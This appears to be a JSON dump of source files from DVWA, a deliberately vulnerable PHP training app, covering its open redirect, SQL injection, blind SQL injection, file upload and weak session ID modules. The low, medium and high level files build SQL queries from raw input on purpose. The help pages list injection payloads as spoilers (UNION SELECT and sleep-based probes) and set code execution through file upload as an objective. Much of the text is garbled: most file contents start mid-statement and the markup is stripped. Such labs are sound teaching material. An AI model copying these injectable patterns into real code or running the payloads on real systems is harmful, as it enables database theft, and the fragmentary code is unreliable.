- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect', \"WSTG - Testing for Client-side URL Redirect\") . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://cwe.mitre.org/data/definitions/601.html', \"Mitre - CWE-601: URL Redirection to Untrusted Site ('Open Redirect')\" ) . \" \r\n\t
Missing redirect target.
\r\n\r\n" }, { "path": "vulnerabilities/open_redirect/source/medium.php", "content": "\r\n\t\tAbsolute URLs not allowed.
\r\n\t\t\r\nMissing redirect target.
\r\n\r\n" }, { "path": "vulnerabilities/sqli/help/help.php", "content": "\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/sqli/index.php",
"content": "\r\n\tHelp - SQL Injection
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\tA SQL injection attack consists of insertion or \"injection\" of a SQL query via the input data from the client to the application.\r\n\t\t\tA successful SQL injection exploit can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database\r\n\t\t\t(such as shutdown the DBMS), recover the content of a given file present on the DBMS file system (load_file) and in some cases issue commands to the operating system. \r\n\r\n\t\tSQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. \r\n\r\n\t\tThis attack may also be called \"SQLi\". \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tThere are 5 users in the database, with id's from 1 to 5. Your mission... to steal their passwords via SQLi. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tThe SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able\r\n\t\t\tto execute any SQL query they wish. \r\n\t\tSpoiler: ?id=a' UNION SELECT \"text1\",\"text2\";-- -&Submit=Submit.\r\n\r\n\t\t\r\n\r\n\t\t Medium Level\r\n\t\tThe medium level uses a form of SQL injection protection, with the function of\r\n\t\t\t\"\".\r\n\t\t\tHowever due to the SQL query not having quotes around the parameter, this will not fully protect the query from being altered. \r\n\r\n\t\tThe text box has been replaced with a pre-defined dropdown list and uses POST to submit the form. \r\n\t\tSpoiler: ?id=a UNION SELECT 1,2;-- -&Submit=Submit.\r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tThis is very similar to the low level, however this time the attacker is inputting the value in a different manner.\r\n\t\t\tThe input values are being transferred to the vulnerable query via session variables using another page, rather than a direct GET request. \r\n\t\tSpoiler: ID: a' UNION SELECT \"text1\",\"text2\";-- -&Submit=Submit.\r\n\r\n\t\t\r\n\r\n\t\t Impossible Level\r\n\t\tThe queries are now parameterized queries (rather than being dynamic). This means the query has been defined by the developer,\r\n\t\t\tand has distinguish which sections are code, and the rest is data. \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\nVulnerability: SQL Injection
\r\n\r\n\t\";\r\nif( $vulnerabilityFile == 'high.php' ) {\r\n\t$page[ 'body' ] .= \"Click here to change your ID.\";\r\n}\r\nelse {\r\n\t$page[ 'body' ] .= \"\r\n\t\t\";\r\n}\r\n$page[ 'body' ] .= \"\r\n\t\t{$html}\r\n\t
\r\n\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/SQL_injection' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/SQL_Injection' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://bobby-tables.com/' ) . \" \r\n\t
\";\r\n\t$page[ 'body' ] .= \"Session ID: {$_SESSION[ 'id' ]}
\";\r\n\t$page[ 'body' ] .= \"\";\r\n}\r\n\r\n$page[ 'body' ] .= \"\r\n\r\n
\r\n
\r\n\r\n\";\r\n\r\ndvwaSourceHtmlEcho( $page );\r\n\r\n?>\r\n\r\n\r\n" }, { "path": "vulnerabilities/sqli/source/high.php", "content": "Something went wrong.' );\r\n\r\n\t\t\t// Get results\r\n\t\t\twhile( $row = mysqli_fetch_assoc( $result ) ) {\r\n\t\t\t\t// Get values\r\n\t\t\t\t$first = $row[\"first_name\"];\r\n\t\t\t\t$last = $row[\"last_name\"];\r\n\r\n\t\t\t\t// Feedback for end user\r\n\t\t\t\t$html .= \"
ID: {$id}
First name: {$first}
Surname: {$last}\";\r\n\t\t\t}\r\n\r\n\t\t\t((is_null($___mysqli_res = mysqli_close($GLOBALS[\"___mysqli_ston\"]))) ? false : $___mysqli_res);\t\t\r\n\t\t\tbreak;\r\n\t\tcase SQLITE:\r\n\t\t\tglobal $sqlite_db_connection;\r\n\r\n\t\t\t$query = \"SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;\";\r\n\t\t\t#print $query;\r\n\t\t\ttry {\r\n\t\t\t\t$results = $sqlite_db_connection->query($query);\r\n\t\t\t} catch (Exception $e) {\r\n\t\t\t\techo 'Caught exception: ' . $e->getMessage();\r\n\t\t\t\texit();\r\n\t\t\t}\r\n\r\n\t\t\tif ($results) {\r\n\t\t\t\twhile ($row = $results->fetchArray()) {\r\n\t\t\t\t\t// Get values\r\n\t\t\t\t\t$first = $row[\"first_name\"];\r\n\t\t\t\t\t$last = $row[\"last_name\"];\r\n\r\n\t\t\t\t\t// Feedback for end user\r\n\t\t\t\t\t$html .= \"ID: {$id}
First name: {$first}
Surname: {$last}\";\r\n\t\t\t\t}\r\n\t\t\t} else {\r\n\t\t\t\techo \"Error in fetch \".$sqlite_db->lastErrorMsg();\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t}\r\n}\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/sqli/source/impossible.php",
"content": "prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );\r\n\t\t\t\t$data->bindParam( ':id', $id, PDO::PARAM_INT );\r\n\t\t\t\t$data->execute();\r\n\t\t\t\t$row = $data->fetch();\r\n\r\n\t\t\t\t// Make sure only 1 result is returned\r\n\t\t\t\tif( $data->rowCount() == 1 ) {\r\n\t\t\t\t\t// Get values\r\n\t\t\t\t\t$first = $row[ 'first_name' ];\r\n\t\t\t\t\t$last = $row[ 'last_name' ];\r\n\r\n\t\t\t\t\t// Feedback for end user\r\n\t\t\t\t\t$html .= \"ID: {$id}
First name: {$first}
Surname: {$last}\";\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase SQLITE:\r\n\t\t\t\tglobal $sqlite_db_connection;\r\n\r\n\t\t\t\t$stmt = $sqlite_db_connection->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;' );\r\n\t\t\t\t$stmt->bindValue(':id',$id,SQLITE3_INTEGER);\r\n\t\t\t\t$result = $stmt->execute();\r\n\t\t\t\t$result->finalize();\r\n\t\t\t\tif ($result !== false) {\r\n\t\t\t\t\t// There is no way to get the number of rows returned\r\n\t\t\t\t\t// This checks the number of columns (not rows) just\r\n\t\t\t\t\t// as a precaution, but it won't stop someone dumping\r\n\t\t\t\t\t// multiple rows and viewing them one at a time.\r\n\r\n\t\t\t\t\t$num_columns = $result->numColumns();\r\n\t\t\t\t\tif ($num_columns == 2) {\r\n\t\t\t\t\t\t$row = $result->fetchArray();\r\n\r\n\t\t\t\t\t\t// Get values\r\n\t\t\t\t\t\t$first = $row[ 'first_name' ];\r\n\t\t\t\t\t\t$last = $row[ 'last_name' ];\r\n\r\n\t\t\t\t\t\t// Feedback for end user\r\n\t\t\t\t\t\t$html .= \"ID: {$id}
First name: {$first}
Surname: {$last}\";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n// Generate Anti-CSRF token\r\ngenerateSessionToken();\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/sqli/source/low.php",
"content": "' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n\r\n\t\t\t// Get results\r\n\t\t\twhile( $row = mysqli_fetch_assoc( $result ) ) {\r\n\t\t\t\t// Get values\r\n\t\t\t\t$first = $row[\"first_name\"];\r\n\t\t\t\t$last = $row[\"last_name\"];\r\n\r\n\t\t\t\t// Feedback for end user\r\n\t\t\t\t$html .= \"ID: {$id}
First name: {$first}
Surname: {$last}\";\r\n\t\t\t}\r\n\r\n\t\t\tmysqli_close($GLOBALS[\"___mysqli_ston\"]);\r\n\t\t\tbreak;\r\n\t\tcase SQLITE:\r\n\t\t\tglobal $sqlite_db_connection;\r\n\r\n\t\t\t#$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);\r\n\t\t\t#$sqlite_db_connection->enableExceptions(true);\r\n\r\n\t\t\t$query = \"SELECT first_name, last_name FROM users WHERE user_id = '$id';\";\r\n\t\t\t#print $query;\r\n\t\t\ttry {\r\n\t\t\t\t$results = $sqlite_db_connection->query($query);\r\n\t\t\t} catch (Exception $e) {\r\n\t\t\t\techo 'Caught exception: ' . $e->getMessage();\r\n\t\t\t\texit();\r\n\t\t\t}\r\n\r\n\t\t\tif ($results) {\r\n\t\t\t\twhile ($row = $results->fetchArray()) {\r\n\t\t\t\t\t// Get values\r\n\t\t\t\t\t$first = $row[\"first_name\"];\r\n\t\t\t\t\t$last = $row[\"last_name\"];\r\n\r\n\t\t\t\t\t// Feedback for end user\r\n\t\t\t\t\t$html .= \"ID: {$id}
First name: {$first}
Surname: {$last}\";\r\n\t\t\t\t}\r\n\t\t\t} else {\r\n\t\t\t\techo \"Error in fetch \".$sqlite_db->lastErrorMsg();\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t} \r\n}\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/sqli/source/medium.php",
"content": "' . mysqli_error($GLOBALS[\"___mysqli_ston\"]) . '' );\r\n\r\n\t\t\t// Get results\r\n\t\t\twhile( $row = mysqli_fetch_assoc( $result ) ) {\r\n\t\t\t\t// Display values\r\n\t\t\t\t$first = $row[\"first_name\"];\r\n\t\t\t\t$last = $row[\"last_name\"];\r\n\r\n\t\t\t\t// Feedback for end user\r\n\t\t\t\t$html .= \"ID: {$id}
First name: {$first}
Surname: {$last}\";\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase SQLITE:\r\n\t\t\tglobal $sqlite_db_connection;\r\n\r\n\t\t\t$query = \"SELECT first_name, last_name FROM users WHERE user_id = $id;\";\r\n\t\t\t#print $query;\r\n\t\t\ttry {\r\n\t\t\t\t$results = $sqlite_db_connection->query($query);\r\n\t\t\t} catch (Exception $e) {\r\n\t\t\t\techo 'Caught exception: ' . $e->getMessage();\r\n\t\t\t\texit();\r\n\t\t\t}\r\n\r\n\t\t\tif ($results) {\r\n\t\t\t\twhile ($row = $results->fetchArray()) {\r\n\t\t\t\t\t// Get values\r\n\t\t\t\t\t$first = $row[\"first_name\"];\r\n\t\t\t\t\t$last = $row[\"last_name\"];\r\n\r\n\t\t\t\t\t// Feedback for end user\r\n\t\t\t\t\t$html .= \"ID: {$id}
First name: {$first}
Surname: {$last}\";\r\n\t\t\t\t}\r\n\t\t\t} else {\r\n\t\t\t\techo \"Error in fetch \".$sqlite_db->lastErrorMsg();\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t}\r\n}\r\n\r\n// This is used later on in the index.php page\r\n// Setting it here so we can close the database connection in here like in the rest of the source scripts\r\n$query = \"SELECT COUNT(*) FROM users;\";\r\n$result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $query ) or die( '' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n$number_of_rows = mysqli_fetch_row( $result )[0];\r\n\r\nmysqli_close($GLOBALS[\"___mysqli_ston\"]);\r\n?>\r\n" }, { "path": "vulnerabilities/sqli/test.php", "content": "\";\n}\n?>\n" }, { "path": "vulnerabilities/sqli_blind/cookie-input.php", "content": "
\";\r\n\t$page[ 'body' ] .= \"\";\r\n}\r\n\r\n$page[ 'body' ] .= \"\r\n\r\n
\r\n
\r\n\r\n\";\r\n\r\ndvwaSourceHtmlEcho( $page );\r\n\r\n?>\r\n\r\n\r\n" }, { "path": "vulnerabilities/sqli_blind/help/help.php", "content": "
\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/sqli_blind/index.php",
"content": "The PHP function \\\"Magic Quotes\\\" is enabled.\";\r\n}\r\n// Is PHP function safe_mode enabled?\r\nif( ini_get( 'safe_mode' ) == true ) {\r\n\t$WarningHtml .= \"Help - SQL Injection (Blind)
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\tWhen an attacker executes SQL injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL query's syntax is incorrect.\r\n\t\t\tBlind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message,\r\n\t\t\tthey get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible.\r\n\t\t\tAn attacker can still steal data by asking a series of True and False questions through SQL statements, and monitoring how the web application response\r\n\t\t\t(valid entry retunred or 404 header set). \r\n\r\n\t\t\"time based\" injection method is often used when there is no visible feedback in how the page different in its response (hence its a blind attack).\r\n\t\t \tThis means the attacker will wait to see how long the page takes to response back. If it takes longer than normal, their query was successful. \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tFind the version of the SQL database software through a blind SQL attack. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tThe SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able\r\n\t\t\tto execute any SQL query they wish. \r\n\t\tSpoiler: ?id=1' AND sleep 5&Submit=Submit.\r\n\r\n\t\t\r\n\r\n\t\t Medium Level\r\n\t\tThe medium level uses a form of SQL injection protection, with the function of\r\n\t\t\t\"\".\r\n\t\t\tHowever due to the SQL query not having quotes around the parameter, this will not fully protect the query from being altered. \r\n\r\n\t\tThe text box has been replaced with a pre-defined dropdown list and uses POST to submit the form. \r\n\t\tSpoiler: ?id=1 AND sleep 3&Submit=Submit.\r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tThis is very similar to the low level, however this time the attacker is inputting the value in a different manner.\r\n\t\t\tThe input values are being set on a different page, rather than a GET request. \r\n\t\tSpoiler: ID: 1' AND sleep 10&Submit=Submit.\r\n\t\t\tSpoiler: Should be able to cut out the middle man..\r\n\r\n\t\t \r\n\r\n\t\t Impossible Level\r\n\t\tThe queries are now parameterized queries (rather than being dynamic). This means the query has been defined by the developer,\r\n\t\t\tand has distinguish which sections are code, and the rest is data. \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\nThe PHP function \\\"Safe mode\\\" is enabled.
\";\r\n}\r\n\r\n$page[ 'body' ] .= \"\r\n\r\n\t
\\n\";\r\n\r\ndvwaHtmlEcho( $page );\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/sqli_blind/source/high.php",
"content": " 0); // The '@' character suppresses errors\r\n\t\t\t\t} catch(Exception $e) {\r\n\t\t\t\t\t$exists = false;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\t((is_null($___mysqli_res = mysqli_close($GLOBALS[\"___mysqli_ston\"]))) ? false : $___mysqli_res);\r\n\t\t\tbreak;\r\n\t\tcase SQLITE:\r\n\t\t\tglobal $sqlite_db_connection;\r\n\r\n\t\t\t$query = \"SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;\";\r\n\t\t\ttry {\r\n\t\t\t\t$results = $sqlite_db_connection->query($query);\r\n\t\t\t\t$row = $results->fetchArray();\r\n\t\t\t\t$exists = $row !== false;\r\n\t\t\t} catch(Exception $e) {\r\n\t\t\t\t$exists = false;\r\n\t\t\t}\r\n\r\n\t\t\tbreak;\r\n\t}\r\n\r\n\tif ($exists) {\r\n\t\t// Feedback for end user\r\n\t\t$html .= 'Vulnerability: SQL Injection (Blind)
\r\n\r\n\t{$WarningHtml}\r\n\r\n\t\";\r\nif( $vulnerabilityFile == 'high.php' ) {\r\n\t$page[ 'body' ] .= \"Click here to change your ID.\";\r\n}\r\nelse {\r\n\t$page[ 'body' ] .= \"\r\n\t\t\";\r\n}\r\n$page[ 'body' ] .= \"\r\n\t\t{$html}\r\n\t
\r\n\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/SQL_injection' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/Blind_SQL_Injection' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://bobby-tables.com/' ) . \" \r\n\t
User ID exists in the database.';\r\n\t}\r\n\telse {\r\n\t\t// Might sleep a random amount\r\n\t\tif( rand( 0, 5 ) == 3 ) {\r\n\t\t\tsleep( rand( 2, 4 ) );\r\n\t\t}\r\n\r\n\t\t// User wasn't found, so the page wasn't!\r\n\t\theader( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );\r\n\r\n\t\t// Feedback for end user\r\n\t\t$html .= '
User ID is MISSING from the database.';\r\n\t}\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/sqli_blind/source/impossible.php", "content": "prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );\r\n\t\t\t\t$data->bindParam( ':id', $id, PDO::PARAM_INT );\r\n\t\t\t\t$data->execute();\r\n\r\n\t\t\t\t$exists = $data->rowCount();\r\n\t\t\t\tbreak;\r\n\t\t\tcase SQLITE:\r\n\t\t\t\tglobal $sqlite_db_connection;\r\n\r\n\t\t\t\t$stmt = $sqlite_db_connection->prepare('SELECT COUNT(first_name) AS numrows FROM users WHERE user_id = :id LIMIT 1;' );\r\n\t\t\t\t$stmt->bindValue(':id',$id,SQLITE3_INTEGER);\r\n\t\t\t\t$result = $stmt->execute();\r\n\t\t\t\t$result->finalize();\r\n\t\t\t\tif ($result !== false) {\r\n\t\t\t\t\t// There is no way to get the number of rows returned\r\n\t\t\t\t\t// This checks the number of columns (not rows) just\r\n\t\t\t\t\t// as a precaution, but it won't stop someone dumping\r\n\t\t\t\t\t// multiple rows and viewing them one at a time.\r\n\r\n\t\t\t\t\t$num_columns = $result->numColumns();\r\n\t\t\t\t\tif ($num_columns == 1) {\r\n\t\t\t\t\t\t$row = $result->fetchArray();\r\n\r\n\t\t\t\t\t\t$numrows = $row[ 'numrows' ];\r\n\t\t\t\t\t\t$exists = ($numrows == 1);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\r\n\t}\r\n\r\n\t// Get results\r\n\tif ($exists) {\r\n\t\t// Feedback for end user\r\n\t\t$html .= '
User ID exists in the database.';\r\n\t} else {\r\n\t\t// User wasn't found, so the page wasn't!\r\n\t\theader( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );\r\n\r\n\t\t// Feedback for end user\r\n\t\t$html .= '
User ID is MISSING from the database.';\r\n\t}\r\n}\r\n\r\n// Generate Anti-CSRF token\r\ngenerateSessionToken();\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/sqli_blind/source/low.php", "content": " 0);\r\n\t\t\t\t} catch(Exception $e) {\r\n\t\t\t\t\t$exists = false;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t((is_null($___mysqli_res = mysqli_close($GLOBALS[\"___mysqli_ston\"]))) ? false : $___mysqli_res);\r\n\t\t\tbreak;\r\n\t\tcase SQLITE:\r\n\t\t\tglobal $sqlite_db_connection;\r\n\r\n\t\t\t$query = \"SELECT first_name, last_name FROM users WHERE user_id = '$id';\";\r\n\t\t\ttry {\r\n\t\t\t\t$results = $sqlite_db_connection->query($query);\r\n\t\t\t\t$row = $results->fetchArray();\r\n\t\t\t\t$exists = $row !== false;\r\n\t\t\t} catch(Exception $e) {\r\n\t\t\t\t$exists = false;\r\n\t\t\t}\r\n\r\n\t\t\tbreak;\r\n\t}\r\n\r\n\tif ($exists) {\r\n\t\t// Feedback for end user\r\n\t\t$html .= '
User ID exists in the database.';\r\n\t} else {\r\n\t\t// User wasn't found, so the page wasn't!\r\n\t\theader( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );\r\n\r\n\t\t// Feedback for end user\r\n\t\t$html .= '
User ID is MISSING from the database.';\r\n\t}\r\n\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/sqli_blind/source/medium.php", "content": " 0); // The '@' character suppresses errors\r\n\t\t\t\t} catch(Exception $e) {\r\n\t\t\t\t\t$exists = false;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\tbreak;\r\n\t\tcase SQLITE:\r\n\t\t\tglobal $sqlite_db_connection;\r\n\t\t\t\r\n\t\t\t$query = \"SELECT first_name, last_name FROM users WHERE user_id = $id;\";\r\n\t\t\ttry {\r\n\t\t\t\t$results = $sqlite_db_connection->query($query);\r\n\t\t\t\t$row = $results->fetchArray();\r\n\t\t\t\t$exists = $row !== false;\r\n\t\t\t} catch(Exception $e) {\r\n\t\t\t\t$exists = false;\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t}\r\n\r\n\tif ($exists) {\r\n\t\t// Feedback for end user\r\n\t\t$html .= '
User ID exists in the database.';\r\n\t} else {\r\n\t\t// Feedback for end user\r\n\t\t$html .= '
User ID is MISSING from the database.';\r\n\t}\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/upload/help/help.php", "content": "
\r\n\t
\r\n\r\n\t
\r\n\r\n"
},
{
"path": "vulnerabilities/upload/index.php",
"content": "Incorrect folder permissions: {$PHPUploadPath}Help - File Upload
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\tUploaded files represent a significant risk to web applications. The first step in many attacks is to get some code to the system to be attacked.\r\n\t\t\tThen the attacker only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. \r\n\r\n\t\tThe consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system, forwarding attacks to backend systems,\r\n\t\t\tand simple defacement. It depends on what the application does with the uploaded file, including where it is stored. \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tExecute any PHP function of your choosing on the target system (such as \r\n\t\t\tor ) thanks to this file upload vulnerability. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tLow level will not check the contents of the file being uploaded in any way. It relies only on trust. \r\n\t\tSpoiler: Upload any valid PHP file with command in it.\r\n\r\n\t\t\r\n\r\n\t\t Medium Level\r\n\t\tWhen using the medium level, it will check the reported file type from the client when its being uploaded. \r\n\t\tSpoiler: Worth looking for any restrictions within any \"hidden\" form fields.\r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tOnce the file has been received from the client, the server will try to resize any image that was included in the request. \r\n\t\tSpoiler: need to link in another vulnerability, such as file inclusion.\r\n\r\n\t\t\r\n\r\n\t\t Impossible Level\r\n\t\tThis will check everything from all the levels so far, as well then to re-encode the image. This will make a new image, therefore stripping\r\n\t\t\tany \"non-image\" code (including metadata). \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\nFolder is not writable.\";\r\n}\r\n// Is PHP-GD installed?\r\nif( ( !extension_loaded( 'gd' ) || !function_exists( 'gd_info' ) ) ) {\r\n\t$WarningHtml .= \"
The PHP module GD is not installed.
\";\r\n}\r\n\r\n$page[ 'body' ] .= \"\r\n\r\n\t
\";\r\n\r\ndvwaHtmlEcho( $page );\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/upload/source/high.php",
"content": "Your image was not uploaded.';\r\n\t\t}\r\n\t\telse {\r\n\t\t\t// Yes!\r\n\t\t\t$html .= \"Vulnerability: File Upload
\r\n\r\n\t{$WarningHtml}\r\n\r\n\t\r\n\t\t\r\n\t\t{$html}\r\n\t
\r\n\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.acunetix.com/websitesecurity/upload-forms-threat/' ) . \" \r\n\t
{$target_path} succesfully uploaded!\";\r\n\t\t}\r\n\t}\r\n\telse {\r\n\t\t// Invalid file\r\n\t\t$html .= 'Your image was not uploaded. We can only accept JPEG or PNG images.';\r\n\t}\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/upload/source/impossible.php", "content": "{$target_file} succesfully uploaded!\";\r\n\t\t}\r\n\t\telse {\r\n\t\t\t// No\r\n\t\t\t$html .= '
Your image was not uploaded.';\r\n\t\t}\r\n\r\n\t\t// Delete any temp files\r\n\t\tif( file_exists( $temp_file ) )\r\n\t\t\tunlink( $temp_file );\r\n\t}\r\n\telse {\r\n\t\t// Invalid file\r\n\t\t$html .= '
Your image was not uploaded. We can only accept JPEG or PNG images.';\r\n\t}\r\n}\r\n\r\n// Generate Anti-CSRF token\r\ngenerateSessionToken();\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/upload/source/low.php", "content": "Your image was not uploaded.';\r\n\t}\r\n\telse {\r\n\t\t// Yes!\r\n\t\t$html .= \"
{$target_path} succesfully uploaded!\";\r\n\t}\r\n}\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/upload/source/medium.php",
"content": "Your image was not uploaded.';\r\n\t\t}\r\n\t\telse {\r\n\t\t\t// Yes!\r\n\t\t\t$html .= \"{$target_path} succesfully uploaded!\";\r\n\t\t}\r\n\t}\r\n\telse {\r\n\t\t// Invalid file\r\n\t\t$html .= 'Your image was not uploaded. We can only accept JPEG or PNG images.';\r\n\t}\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/view_help.php", "content": "' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . \"vulnerabilities/{$id}/help/help.php\" ) . '' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . \"vulnerabilities/{$id}/help/help.{$locale}.php\" ) . 'Not Found\";\r\n}\r\n\r\n$page[ 'body' ] .= \"\r\n\r\n\r\n\r\n
\r\n\t{$help}\r\n
\\n\";\r\n\r\ndvwaHelpHtmlEcho( $page );\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/view_source.php",
"content": "vulnerabilities/{$id}/source/{$security}.js\r\n\t\t\r\n\t\t\t\r\n\t\t\t\t
\r\n\t\t
\r\n\t\t\";\r\n\t}\r\n\r\n\t$page[ 'body' ] .= \"\r\n\t\" . highlight_string( $js_source, true ) . \" | \r\n\t\t\t\t
\r\n\t\t
\r\n\r\n\t\t\r\n\t
\\n\";\r\n} else {\r\n\t$page['body'] = \"{$vuln} Source
\r\n\r\n\t\tvulnerabilities/{$id}/source/{$security}.php
\r\n\t\t\r\n\t\t\t\r\n\t\t\t\t
\r\n\t\t
\r\n\t\t{$js_html}\r\n\t\t\" . highlight_string( $source, true ) . \" | \r\n\t\t\t\t
\r\n\r\n\t\t\r\n\t
Not found
\";\r\n}\r\n\r\ndvwaSourceHtmlEcho( $page );\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/view_source_all.php", "content": "\r\n\t\t{$vuln}
\r\n\t\t\r\n\r\n\t\t
Impossible {$vuln} Source
\r\n\t\t{$impsrc} | \r\n\t\t\t
\r\n\r\n\t\t
High {$vuln} Source
\r\n\t\t{$highsrc} | \r\n\t\t\t
\r\n\r\n\t\t
Medium {$vuln} Source
\r\n\t\t{$medsrc} | \r\n\t\t\t
\r\n\r\n\t\t
Low {$vuln} Source
\r\n\t\t{$lowsrc} | \r\n\t\t\t
\r\n\r\n\t\t\r\n\r\n\t\\n\";\r\n} else {\r\n\t$page['body'] = \"
Not found
\";\r\n}\r\n\r\ndvwaSourceHtmlEcho($page);\r\n\r\n?>" }, { "path": "vulnerabilities/weak_id/help/help.php", "content": "\r\n\t
\r\n"
},
{
"path": "vulnerabilities/weak_id/index.php",
"content": "\r\n\tHelp - Weak Session IDs
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\tKnowledge of a session ID is often the only thing required to access a site as a specific user after they have logged in, if that session ID is able to be calculated or easily guessed, then an attacker will have an easy way to gain access to user accounts without having to brute force passwords or find other vulnerabilities such as Cross-Site Scripting. \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tThis module uses four different ways to set the dvwaSession cookie value, the objective of each level is to work out how the ID is generated and then infer the IDs of other system users. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tThe cookie value should be very obviously predictable. \r\n\r\n\t\tMedium Level\r\n\t\tThe value looks a little more random than on low but if you collect a few you should start to see a pattern. \r\n\r\n\t\tHigh Level\r\n\t\tFirst work out what format the value is in and then try to work out what is being used as the input to generate the values. \r\n\t\tExtra flags are also being added to the cookie, this does not affect the challenge but highlights extra protections that can be added to protect the cookies. \r\n\r\n\r\n\t\tImpossible Level\r\n\t\tThe cookie value should not be predictable at this level but feel free to try. \r\n\t\tAs well as the extra flags, the cookie is being tied to the domain and the path of the challenge. \r\n\t | \r\n\t
Reference:
\r\n\tReference:
